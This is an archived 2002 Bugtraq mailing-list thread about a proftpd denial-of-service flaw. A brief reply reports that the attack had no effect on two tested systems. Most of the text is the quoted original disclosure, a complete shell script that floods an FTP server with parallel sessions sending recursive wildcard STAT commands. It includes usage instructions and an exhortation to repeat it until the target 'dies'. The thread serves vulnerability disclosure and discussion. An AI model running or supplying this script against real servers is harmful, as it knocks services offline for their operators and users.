[VulnDiscuss] Re: proftpd <=1.2.7rc3 DoS

"????????? `??????' ??????" <[email protected]>
Newsgroups gmane.comp.security.vulnerabilities.watch.general,gmane.comp.security.bugtraq
Organization ÏÐÖÍÈÒ
Message-ID <[email protected]>
Tested on Linux w/ proftpd 1.2.4
and NetBSD 1.6 proftpd 1.2.7
both no effect
                                        G
----- Original Message ----- 
From: "Rob klein Gunnewiek" <[email protected]>
To: <[email protected]>; <[email protected]>
Sent: Sunday, December 08, 2002 3:53 PM
Subject: proftpd <=1.2.7rc3 DoS


> Hello,
> 
> proftpd is vulnerable to denial of service similar to the list
> */../*/../*/../*.
> 
> #!/bin/sh
> #
> # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> # might work against many other FTP daemons
> # consumes nearly all memory and alot of CPU
> #
> # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> #
> # 7-dec-02 - detach  -  www.duho.org
> #
> # use: ./prodos.sh <host> <user> <pass>
> # do this some more to make sure the system eventually dies
> 
> cnt=25
> while [ $cnt -gt 0 ] ; do
> ftp -n << EOF&
> o $1
> quote user $2
> quote pass $3
> quote stat /*/*/*/*/*/*/*
> quit
> EOF
> let cnt=cnt-1
> done
> sleep 2
> killall -9 ftp
> echo DONE!
> 
> #end
>
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.